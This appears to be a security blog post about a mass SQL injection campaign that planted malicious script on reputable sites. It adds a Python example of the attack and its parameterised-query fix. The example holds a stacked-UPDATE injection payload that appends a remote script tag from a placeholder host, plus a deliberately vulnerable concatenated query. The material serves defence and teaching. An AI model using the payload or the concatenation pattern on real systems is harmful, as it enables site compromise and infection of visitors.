Are you safe? A virulent and effective new “virus” is sweeping the Internet. It is not a virus in the usual sense: attackers are using SQL injection to plant attack code on genuine, reputable websites that do not properly enforce good security practices, and that code then attempts to exploit vulnerabilities in the Windows software of unsuspecting users who visit those sites. It is proving effective precisely because users would not reasonably expect to pick up a problem from such sites. The injected code attempts to exploit 8 known vulnerabilities in Windows software, all of which have now been closed if you have run Windows Update recently. High-profile victims include the USA’s Department of Homeland Security and parts of the UK’s Civil Service website. A Google search for the attack code returns over 100,000 results.
Webmasters should check their own website for the attack code. A Google ‘site:’ search is a quick first pass, but the index lags behind the live site, so a clean result is not proof of a clean database; search the database’s text columns directly as well. The attack has proven most successful on websites running IIS and MS SQL Server. More importantly, make sure user-submitted content is validated against what the application expects and, above all, passed to the database through parameterised queries rather than concatenated into SQL strings. Ad-hoc sanitisation alone is what leaves a site susceptible to SQL injection.
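To make both halves of that advice concrete, here is an added example (not code from the original post) that uses Python’s sqlite3 module as a stand-in for MS SQL Server, since the mechanics of the injection and of the fix are the same. It shows a lookup built by string concatenation, the stacked UPDATE an attacker can append through it to deface every row, the parameterised version that binds the same input inertly, and a scan of every text column for an injected `<script` tag of the kind a webmaster should run against the real database rather than relying on a search engine’s index. The table, the `example.invalid` script URL and the payload are constructed for the example and are not the real attack’s.

```python
import sqlite3

# Constructed sample data: a tiny product table standing in for an MS SQL Server
# database behind an IIS site. sqlite3 is used only so the example runs offline;
# the injection mechanics and the fix are the same in T-SQL.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);
INSERT INTO products (name, blurb) VALUES ('Widget', 'A fine widget');
INSERT INTO products (name, blurb) VALUES ('Gadget', 'A fine gadget');
"""

# Placeholder script tag, not the real attack payload. example.invalid never resolves.
INJECTED_TAG = '<script src="http://example.invalid/x.js"></script>'

# What an attacker would put in an "id" URL parameter: close off the intended
# statement, then stack an UPDATE that appends the tag to every row.
PAYLOAD = "1; UPDATE products SET blurb = blurb || '" + INJECTED_TAG + "'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, product_id):
    """Classic-ASP style: the raw parameter is glued into the SQL text.

    sqlite3's execute() refuses to run more than one statement, so executescript()
    is used here to mimic a driver that happily runs stacked statements, as the
    drivers on the affected IIS/MS SQL sites did. Any result rows are discarded.
    """
    sql = "SELECT name FROM products WHERE id = " + product_id
    conn.executescript(sql)


def safe_lookup(conn, product_id):
    """Parameterised: the value is bound, never parsed as SQL.

    A real handler would also validate that the id is a positive integer before
    querying; here the hostile string simply matches nothing and returns None.
    """
    row = conn.execute(
        "SELECT name FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return row[0] if row else None


def find_injected_markup(conn, needle="<script"):
    """Scan every text column of every table for the needle.

    Returns a sorted list of (table, column, rowid). Identifiers come from the
    catalogue, not from user input, so quoting them into the SQL is safe; the
    needle itself is bound as a parameter. On MS SQL Server the equivalent walks
    INFORMATION_SCHEMA.COLUMNS for char/varchar/text columns.
    """
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')
                if (r[2] or "").upper() in ("TEXT", "VARCHAR", "NVARCHAR")]
        for col in cols:
            rows = conn.execute(
                f"""SELECT rowid FROM "{table}" WHERE "{col}" LIKE '%' || ? || '%'""",
                (needle,))
            hits.extend((table, col, r[0]) for r in rows)
    return sorted(hits)


if __name__ == "__main__":
    db = make_db()
    print("parameterised lookup with hostile input:", safe_lookup(db, PAYLOAD))
    print("rows tainted afterwards:", find_injected_markup(db))
    vulnerable_lookup(db, PAYLOAD)
    print("rows tainted after concatenated query:", find_injected_markup(db))
```

Run as a script, the parameterised lookup returns nothing and leaves the table untouched, while the concatenated version lets the stacked UPDATE taint every row, which the scan then reports. The scan is the check worth keeping: on SQL Server it maps onto a loop over INFORMATION_SCHEMA.COLUMNS, and it looks for the tag in the data, where it actually lives, instead of in a search engine’s copy of your pages.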